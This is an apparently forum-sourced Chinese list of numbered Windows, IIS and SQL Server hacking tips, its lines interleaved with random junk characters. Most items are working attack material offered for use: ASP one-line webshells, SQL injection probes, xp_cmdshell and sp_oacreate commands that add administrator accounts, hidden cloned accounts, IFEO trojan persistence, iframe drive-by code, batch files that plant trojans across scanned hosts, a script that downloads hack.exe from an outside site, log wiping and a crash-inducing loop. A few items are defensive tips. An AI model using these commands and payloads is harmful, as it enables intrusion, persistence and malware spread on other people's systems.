1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,7 M) F- [' N' u0 O4 A' u- [
cacls C:\windows\system32 /G hqw20:R
" C+ m6 |/ O1 Y思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
, c, O4 j8 u) p恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
. {1 O O6 U$ @$ B% G2 d+ b$ N# [; D
% x( i$ N. g" q5 m2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 E' i! T: u @" N& J: f' l' m' q4 X( T/ T( Q0 O& z: m! r
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。& f! @% y+ v6 F0 S
1 Y# u7 @6 E, H( q' e
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
' O/ f$ X" ?* `
: B$ N/ q5 T, K3 {0 C5、利用INF文件来修改注册表
$ u. u) z3 n; R; H2 C& u6 r[Version]& Y+ D$ ~0 c* w q2 l! ]; e
Signature="$CHICAGO$". W0 O# k3 j% `7 X! F/ r a
[Defaultinstall]
4 U7 D3 h: p9 i( ^0 caddREG=Ating
( x$ r' Q6 ~# T, t, r[Ating]- c7 s% H$ H, z9 _" J+ |) A. ^" a
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
+ V1 F% l: z! S3 _ O# R9 |5 Q以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:- P" @% V2 e6 G$ o
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
6 _/ @) c2 U2 \5 Z7 D6 w5 g% _其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU+ L8 O5 e4 m2 C% X' y$ ?; q# @
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU( H0 a& Q Q8 J. U% ^2 M6 |0 a O% ?
HKEY_CURRENT_CONFIG 简写为 HKCC4 E( Q. E" M- E' e7 W1 d3 j
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值) @$ s: Z- k5 o% _
"1"这里代表是写入或删除注册表键值中的具体数据$ F1 o- u4 b9 z+ C% m( g
1 V7 [, Z, _: f2 h4 h/ F
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,! Y0 ]; t) f0 U8 e. A
多了一步就是在防火墙里添加个端口,然后导出其键值3 v" P' Q# v' M& R- A' i9 X' D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
$ x1 a/ J- N! g6 ~. p7 H* w% z1 v! e$ i3 M' C# X
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
( b; C# f# u2 W5 x在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。+ w( {9 S2 C: @
: `7 v+ ]0 P2 _ A$ Y8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
2 l, f; t! ~& \1 }9 K4 e
0 J! L7 b3 d' y* F6 n4 w. Z |9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
9 ~1 }" [: _1 i% T可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ ~$ r7 e& l) K0 P4 J2 z; `9 H7 T( W
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
& c# C2 b6 N x/ B/ i8 M
- M! n: C$ f& F6 |11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 |! I/ X; D% P6 }0 {用法:xsniff –pass –hide –log pass.txt, J% R& ~& M. G8 p" c$ i Y! P
( M) N2 U9 W2 q+ Z, D/ [6 D
12、google搜索的艺术
; O$ U) A0 _) a- p: B, |: w搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
2 ^2 t& D" g- \# x4 }或“字符串的语法错误”可以找到很多sql注入漏洞。) T2 X! w0 v. Y( O+ q
0 w4 R `+ X& p& }3 \1 ?' L& b
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。7 `! d- _# M& T; l! N9 g+ @0 K
5 a. S2 F. d! K( `, }# P! Z* Y14、cmd中输入 nc –vv –l –p 19873 O/ `( j3 h% v) P2 j- K& H
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
& o( h" C6 F i! ^
$ y- D% r. @, u15、制作T++木马,先写个ating.hta文件,内容为 n h$ m: N/ ^% H9 E3 a
<script language="VBScript">- r! h# r, u- H0 i* z
set wshshell=createobject ("wscript.shell" )* }1 M* r2 E6 F, i/ B( @/ q0 r4 C0 L$ u% K
a=wshshell.run("你马的名称",1)
, ?, F `, |- W7 K* Uwindow.close
! b/ u+ m8 A, k) V0 z</script>& X* B. B. s G. ~) G
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
J& E+ R: ]& B9 j. T
6 y# b$ d) e8 |* F16、搜索栏里输入
$ E/ c) t" N0 ?- Q1 d: O3 J关键字%'and 1=1 and '%'='' B) z$ G, t! H( R0 A; k
关键字%'and 1=2 and '%'=') ?/ ?4 l& c' L
比较不同处 可以作为注入的特征字符5 m1 L+ n- X! c. X* I9 e5 k/ | H
5 Y+ z. b( H" Z
17、挂马代码<html>
3 N! V3 j3 ^- R: F! G" F<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>- D$ H2 ]. x, g, a- j! @; [
</html>
6 w" T* D5 w5 x/ \ V R/ a& A' t( Y1 m! G
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
- [$ L) H+ {! e% Tnet localgroup administrators还是可以看出Guest是管理员来。4 a7 r& x) K, _0 z6 T9 a* H) b
$ R: [7 H8 h3 g; D
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
1 V9 J* k! B; F" A用法: 安装: instsrv.exe 服务名称 路径4 Y8 s& d1 l2 I# t! z ~
卸载: instsrv.exe 服务名称 REMOVE6 E: J6 z' E4 x2 A" V/ _
2 K! ]7 R6 Q3 ~- ~
2 G" O; y. U3 @( S21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉* J( @3 x$ k" R0 B
不能注入时要第一时间想到%5c暴库。
3 X0 `) M3 k& F" B! X7 a. H7 B/ n! e
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
5 ^' U4 z. b/ M3 S0 m
8 d( J$ y3 G9 `8 B23、缺少xp_cmdshell时: Z! u: z: u# x4 i; `
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
Q' `" \6 p ]5 Q1 I' f5 N假如恢复不成功,可以尝试直接加用户(针对开3389的)
2 X. K4 O {# P4 |declare @o int
: F% a) B9 e* z5 g4 A, dexec sp_oacreate 'wscript.shell',@o out- D1 C6 S! V6 O* b7 R
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员+ S, E+ R, {3 k3 M( B' f+ U
2 X( |# x. J5 I- z. @; V& C+ o
24.批量种植木马.bat
: t+ ]' M* { M9 U. [0 H# I- Lfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中: N# M0 q/ L1 y) k6 m6 H* M
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间: N1 g# s5 }# c5 B4 X5 F& p/ ?
扫描地址.txt里每个主机名一行 用\\开头0 o( k! K' [$ [: ~( k6 l: ]: w
, W* I: H& e$ g9 M* v5 Y25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
5 Q' d; H9 r1 m6 S
: J5 k1 x# w0 h" p2 r5 x% {6 G) U26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
{' O; `3 o1 `3 Q+ ?. ?将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.! R# @* h' t. N" P4 }* i
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马9 {# A1 W# p" x2 u8 e: M' S4 j0 s
( q4 \, S2 i: L0 K- g$ y27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
+ Z( y0 i$ N: f/ v然后用#clear logg和#clear line vty *删除日志
( Y+ a1 f( `9 M3 k! Y) E! O
, @% Z9 B! P* [7 p9 D28、电脑坏了省去重新安装系统的方法
9 g& |. j* d) z* B纯dos下执行,
1 Q! M2 G: G, H. N0 l, Nxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config' r+ [* `- u$ f" H2 t+ [7 }- c1 U
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config7 Q0 f0 Z1 |( W+ u* {- E4 n
6 y0 g% G$ L. w' U
29、解决TCP/IP筛选 在注册表里有三处,分别是:
0 W3 r [: S d" ^$ KHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip7 g: v, B+ x! ?3 J" @' a6 g
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. \" L V B0 a7 d; n3 b! s" s9 e" J
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 K$ b2 i! ]2 h
分别用* F1 c+ F% l8 e
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: ^/ Y+ M& q F: \5 \0 Xregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. c$ z, e' G- e# }) ~; M# ~" i! w
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 j; Y$ }% n. i+ k8 y: p- C命令来导出注册表项
) V; L+ w4 r6 O3 b- f, ?然后把三个文件里的EnableSecurityFilters"=dword:00000001,5 h0 ?6 b. U: |2 x6 l2 c9 i
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用 b9 \ D' S/ t
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
4 }% j- S" H5 B
! P& K3 }! D( d, l3 e$ `6 P30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U: l! k Y3 q' ~2 ~% g: Q% c7 U( b
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3; `9 h3 M8 K% a3 [
' t+ i/ N$ `" h b6 M" E
31、全手工打造开3389工具
! y2 ]/ q( i$ a+ y" | `; j. I6 @打开记事本,编辑内容如下:
' C7 B8 t, I5 iecho [Components] > c:\sql
8 n3 [. V6 S7 c0 k3 i, M9 uecho TSEnable = on >> c:\sql: m. G/ n' m# [* p4 q r, d A
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
6 L. T; N H# i T t9 k编辑好后存为BAT文件,上传至肉鸡,执行) p- ]' [) d. x. ~8 [8 ?
$ M8 g" ^+ t. q5 D8 U32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马5 ?4 c1 n- Z* G$ B
( x# F) ^* [6 f2 n) ^3 `5 D
33、让服务器重启
* K! X# G2 B& o8 {! x写个bat死循环:
- _* Q( \! x8 ]@echo off
. ^4 G6 l" b2 H! { r' l:loop12 P3 ~. w# a( {( n5 ]( C! J
cls
+ F% e6 o7 U1 ]4 dstart cmd.exe
( t6 f. X' O+ J. \goto loop1
3 c- A* V' N9 \4 D# x保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
& j7 A7 H& f; [8 v: c1 y3 |2 @2 E$ v0 s$ O
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,* X. V2 N0 ]+ w( A
@echo off
* v2 K% b# I0 h5 Q' c; S+ L& vdate /t >c:/3389.txt
/ k1 X0 J1 w+ D& B4 q' Mtime /t >>c:/3389.txt/ q0 Y- @8 t) {1 I, p! |$ T9 j* C
attrib +s +h c:/3389.bat! `" q9 O% L. V- @. U& ?
attrib +s +h c:/3389.txt
& I; t8 p& D" {3 Inetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
/ `& L8 E* O& }0 z8 j并保存为3389.bat$ y" I* _( D0 `, t6 }6 {
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号9 O1 w9 W* E/ z, f
5 m9 ~9 G' Y( r% U C9 P i$ C
35、有时候提不了权限的话,试试这个命令,在命令行里输入:7 A3 v& S# r5 c4 w) }
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
, N3 x0 Z" r ~5 a3 c输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
1 g8 c5 b- Y5 b" S) E9 Q2 _
7 R s* {9 ]% I' n) ?8 |+ F36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
0 h% F/ E! _3 X D( g0 N [$ zecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址% y: v; h4 g8 k! I, E
echo 你的FTP账号 >>c:\1.bat //输入账号
1 T- H" Q l2 o* A8 M fecho 你的FTP密码 >>c:\1.bat //输入密码
& t" u- \: ]& B6 ~, N5 y4 J+ cecho bin >>c:\1.bat //登入9 `" p3 V h6 i* d9 r0 D4 I
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么7 F. P0 T2 W9 i* ?2 ~
echo bye >>c:\1.bat //退出
) \% e( l: u4 \7 i9 o9 l然后执行ftp -s:c:\1.bat即可
+ X7 z- N6 Z+ y% M5 S* F8 Q2 q( T/ {7 |
37、修改注册表开3389两法
% X4 t- W- y- a* o9 B(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表! Q5 X5 l. A5 \" ]5 x! }. H
echo Windows Registry Editor Version 5.00 >>3389.reg
/ l: G- ]8 J" _; a; F. H0 Yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg8 x: x5 u4 T0 ?. c
echo "Enabled"="0" >>3389.reg. W9 p+ q( q+ G" ~' w+ ^4 b
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
, z/ ]+ X) L' p4 z8 }, _! JNT\CurrentVersion\Winlogon] >>3389.reg+ v3 I# _1 @& e4 ^
echo "ShutdownWithoutLogon"="0" >>3389.reg7 G& c$ Q& A& \1 Q0 C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
5 r$ L+ q5 K, o5 R7 ]; D>>3389.reg
7 f( j; z3 _. j( J, [echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg0 a) r- v$ N* L' p4 D# u- x* G8 Y# U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]: U$ A* |3 y4 P' B6 B. D( r0 z' [
>>3389.reg& x6 r5 `6 n( k1 y" a+ W9 y0 u
echo "TSEnabled"=dword:00000001 >>3389.reg: O- C' _2 V: c' g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg: s3 L8 g/ Q9 N! Q/ ~6 ]7 C( a
echo "Start"=dword:00000002 >>3389.reg
( r. o) d7 V- y3 H5 _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
# O3 C. ]8 o6 W; y>>3389.reg* \: q4 Q- Z9 P) X0 T: R
echo "Start"=dword:00000002 >>3389.reg( m; k/ r. r( h% O7 L7 M
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg) ]* a8 j n- o3 k
echo "Hotkey"="1" >>3389.reg
7 ?& o5 @) |. D4 A" B: x7 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 M3 f; i: i% `: @. u: sServer\Wds\rdpwd\Tds\tcp] >>3389.reg
: H0 ~% V9 c! a% A: a; Necho "PortNumber"=dword:00000D3D >>3389.reg
9 U- Z/ C! R/ i8 X) F! necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" L5 S! z7 Y1 v; H: p# Y/ ]9 eServer\WinStations\RDP-Tcp] >>3389.reg
( i6 k/ M: o4 }9 hecho "PortNumber"=dword:00000D3D >>3389.reg
3 `0 U; g+ n" M9 G3 T$ M把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。$ @; D3 U ]2 H# A3 k
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)# Q$ Z+ X# A, b9 r+ A
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
- M6 H: [! s* N' t5 }$ v* E: V(2)winxp和win2003终端开启9 l! R4 V3 z/ @
用以下ECHO代码写一个REG文件:+ G6 u+ C* R# R/ J1 s
echo Windows Registry Editor Version 5.00>>3389.reg
! q" w) |+ t& A1 e- q7 Z8 Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% ^+ | f& V! X# U: F6 y
Server]>>3389.reg
! @4 T; `0 e# a7 Q% ~4 Z: a/ \' ^echo "fDenyTSConnections"=dword:00000000>>3389.reg
' x B& X8 j: {$ m: Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 R' u- B" i% I% n% E2 S0 iServer\Wds\rdpwd\Tds\tcp]>>3389.reg
. C9 a5 l# z; r, d3 hecho "PortNumber"=dword:00000d3d>>3389.reg
/ }1 q: @: @, |6 t0 Z" z( O9 u; Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 Z) ^ m2 a+ o
Server\WinStations\RDP-Tcp]>>3389.reg6 y5 z4 D9 x; b" U/ o0 O2 ^: j
echo "PortNumber"=dword:00000d3d>>3389.reg- D D, \9 o x9 ]$ o* H
然后regedit /s 3389.reg del 3389.reg8 c# Q; L+ l& W1 Z2 r" j7 R
XP下不论开终端还是改终端端口都不需重启0 G. J1 H: M7 {+ a
& g2 h9 c* [ l! [ B# f38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃3 E9 b7 S7 T4 n
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
: f `# O) @0 B9 N0 F+ V1 D
# z7 n0 k% _/ c; _& H39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
+ q5 E( Q# O) Q# g5 o(1)数据库文件名应复杂并要有特殊字符
- `- F, b7 u$ Y9 C(2)不要把数据库名称写在conn.asp里,要用ODBC数据源' A- w' n L n; ?, G N
将conn.asp文档中的
5 A# C6 h4 `* X. r9 i6 z" gDBPath = Server.MapPath("数据库.mdb")$ B( n) T0 n; L
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 i7 f6 F4 o/ ^9 ?1 k- }
3 J2 ^* [ _: o: {& R3 s
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
# R; m2 ]6 { h6 R! Y(3)不放在WEB目录里
- R7 e. m N; d1 n! q0 U a7 ~/ e( @" `, z
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉3 K4 y" F. f0 |! }
可以写两个bat文件 I3 p9 ~! N% F' C7 J7 h
@echo off. [ w2 a- J. {8 Z2 h
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
' D- u; B( U% c: h9 \. P@del c:\winnt\system32\query.exe
7 _6 x: i4 H' \+ P$ z@del %SYSTEMROOT%\system32\dllcache\query.exe; K, @( l4 c; C4 T! s
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的/ c$ c3 F; m2 h4 m! V) b9 o
4 t$ U8 G0 T& r9 I$ t3 n( j@echo off
, g5 s6 e3 w4 E/ B@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
' k6 R$ g, @0 a: `6 k) A5 |@del c:\winnt\system32\tsadmin.exe
5 o) {5 f* c S% O6 W: e6 n@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex$ Q% A* D) o4 L& l* z7 o6 I
1 s7 u: M+ f$ C0 d' h, I" g
41、映射对方盘符
0 V( ]* a( J3 ?4 [: etelnet到他的机器上,
2 G$ w# F8 r& m9 E0 }2 a, j4 ^. snet share 查看有没有默认共享 如果没有,那么就接着运行- M5 G/ T `0 j3 N! ~5 }6 e
net share c$=c:
3 N- m% q$ i4 Bnet share现在有c$( i, p- ^ t& O
在自己的机器上运行
4 ~1 F n2 l5 m6 Y# M( D6 ~6 V9 t* |net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K, O! z9 d8 n/ w' a
& \& Z; |& U6 Y5 [2 p6 _) Y$ e42、一些很有用的老知识, {' K- n- H+ o
type c:\boot.ini ( 查看系统版本 )# X$ W6 L3 ?' q
net start (查看已经启动的服务)
8 |; U4 s% b% C' E/ K8 d. Z/ J7 cquery user ( 查看当前终端连接 )
4 ^) U* z- y$ K+ D. Znet user ( 查看当前用户 )
' v9 |: v% k) C- {; H1 \net user 用户 密码/add ( 建立账号 )
8 @9 ^1 F9 A6 e2 }. l1 Hnet localgroup administrators 用户 /add (提升某用户为管理员)
7 ^0 l: H: l/ i$ N% T8 x# L" oipconfig -all ( 查看IP什么的 )% k' [( O0 K+ `3 W5 T
netstat -an ( 查看当前网络状态 )# \8 @' l' L& q/ j
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
2 F9 R& t$ s# y! h5 Y克隆时Administrator对应1F4
5 ^% L2 y; o& l8 M" K1 P5 A! Pguest对应1F5
5 T/ `- F( O M$ w5 {, t+ \tsinternetuser对应3E8: {& N( t% ~. O2 o
3 F" [3 E \6 X1 l, y% R# \0 u
43、如果对方没开3389,但是装了Remote Administrator Service/ W) B& E% u; U
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
) B5 o0 B+ f+ W* a6 \" X. X解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
0 P+ F. E+ G5 y1 F! r* o* D先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"" ?. z* t& a. }6 B& e/ I
5 k5 h/ O; i- P44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)( K% ~- O5 \1 ?4 m3 \' H
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)1 K' O/ ~, ^5 ]; w6 L, `
, G1 b' q0 B2 z% O6 Z6 t45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入) B5 L# m' N8 {. h* G' {
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open8 f9 n" J: B) z* t; b
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =+ L0 B# O+ z H- `
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
^8 n% R+ F: q! N: A9 j6 p- E1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
% O* N3 a* a7 p: Y* q' ?(这是完整的一句话,其中没有换行符)% ~7 C) {5 y j& L8 \
然后下载:
$ d4 a; F0 `0 Q9 m# l kcscript down.vbs http://www.hack520.org/hack.exe hack.exe
c/ t# h& {: z2 N
' I% |7 |) m0 K. A- d46、一句话木马成功依赖于两个条件:$ R' O; B; P$ f9 e: _* I/ P
1、服务端没有禁止adodb.Stream或FSO组件! F J5 q; {: d- h9 B- ]! U ]' ` g
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。& g" I1 a2 m6 b' ]" e6 X& z
5 ]# x( |9 @3 W7 ~/ ^
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
8 t8 q) j w3 A3 N' Q7 W;alter database utsz set RECOVERY FULL--
8 y$ L& d3 e% j. v;create table cmd (a image)--
G* E# A$ E6 |6 N. w! z' Y' {;backup log utsz to disk = 'D:\cmd' with init--
t8 D/ K$ M5 W6 E |2 T! e: i;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
) R3 r. L) w) G5 M# s1 G;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
/ K& U1 {2 c8 N9 ~1 p2 n/ [3 b' `注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
/ w! M3 w4 N3 }& Q5 @9 ^6 d
4 @" `9 U! W8 h2 n48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
0 O! i! s+ J/ c1 m6 X
`0 w, O6 a/ N( O J: f+ ~& ]2 \用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
# i0 ~& O4 {" w) m所有会话用 'all'。 f# U ]+ F) I
-s sessionid 列出会话的信息。4 ]& T* q$ f4 {. f! V1 b$ ]1 M
-k sessionid 终止会话。
- d7 v0 F8 F/ n4 e5 q-m sessionid 发送消息到会话。1 J% }3 G( y& Q3 L# u- E
& `: C9 V7 `0 n& l* m2 y
config 配置 telnet 服务器参数。- H; h6 x! a5 B: E+ P
0 f6 Z! ^+ n, q2 Gcommon_options 为:
$ }4 F3 R0 T& [! Y/ P1 I-u user 指定要使用其凭据的用户
& ~4 o! k7 \- a8 w# b9 W-p password 用户密码
6 O5 l% I. u6 N4 o* s
r3 w2 v9 g4 n9 O! u. W2 bconfig_options 为:
* W( I* t. e/ s/ [$ Tdom = domain 设定用户的默认域9 M6 z5 ^% D6 r0 M; B
ctrlakeymap = yes|no 设定 ALT 键的映射* E0 L7 v2 U6 V
timeout = hh:mm:ss 设定空闲会话超时值
) `4 X: S6 t9 ~. n+ a# u4 C* Q1 ytimeoutactive = yes|no 启用空闲会话。
! ]5 @. W) |9 S9 J/ p6 @maxfail = attempts 设定断开前失败的登录企图数。
" v; u1 p3 W4 Amaxconn = connections 设定最大连接数。
) ^; Z3 y. J7 H9 Yport = number 设定 telnet 端口。+ H) a5 O( T: v/ x' K% h
sec = [+/-]NTLM [+/-]passwd, s$ w' g$ h! A# w2 O
设定身份验证机构
- z( L% |7 u! d# q; [fname = file 指定审计文件名。0 T; b3 d R+ }. N" p4 Q X- L7 K
fsize = size 指定审计文件的最大尺寸(MB)。2 E* \% b; E. S8 k* ]
mode = console|stream 指定操作模式。- A+ M5 x0 A( D! r; a$ E, p6 |0 m
auditlocation = eventlog|file|both
! q# \3 r) Z, X$ g# w% P指定记录地点
- ^9 w/ t+ F2 P2 j+ H. uaudit = [+/-]user [+/-]fail [+/-]admin
9 v: M, t( a9 o, |& E8 y
6 _' Q, e( R( S49、例如:在IE上访问:
0 L* C0 L0 [: D, `8 k8 Pwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
/ i4 a7 O% @: _/ s0 S; Q o0 Q) hhack.txt里面的代码是:2 ?# w) K- W, N0 H
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">9 \* [4 q& `2 T, z, e2 Z
把这个hack.txt发到你空间就可以了!2 H% z& }+ j- [# G- P
这个可以利用来做网马哦!
8 \/ Y$ k) Q9 j/ q3 ?9 B/ G2 q- k% ]- \- A$ z& R, L8 H
50、autorun的病毒可以通过手动限制! H4 A( I7 E* ^3 O! Y& z6 e
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
- x( A! v6 M+ h; z6 @3 n S B2,打开盘符用右键打开!切忌双击盘符~
: z. ^; d) @, x, x2 w2 w3 t& w3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!3 U2 S1 @! S# a. q9 e! ~7 z& c
/ n7 u# Y! |7 {0 x
51、log备份时的一句话木马:
( a- [$ T1 S- B# D+ ]0 a9 F- Ea).<%%25Execute(request("go"))%%25>/ y0 D4 [7 T- l2 X8 |& A
b).<%Execute(request("go"))%>
" v) \$ ^3 b; y4 b' x+ y- B5 j9 Mc).%><%execute request("go")%><%4 ?% n5 s G% ~: ?. Y* L( n3 H7 X
d).<script language=VBScript runat=server>execute request("sb")</Script>. K5 t( x: i. c, c+ R* l& s
e).<%25Execute(request("l"))%25>
: n8 A6 Z5 Y* P, c i4 R) i7 hf).<%if request("cmd")<>"" then execute request("pass")%>
8 ~" d4 [' y# E; D) I G$ a; l+ n$ _' e# w
52、at "12:17" /interactive cmd
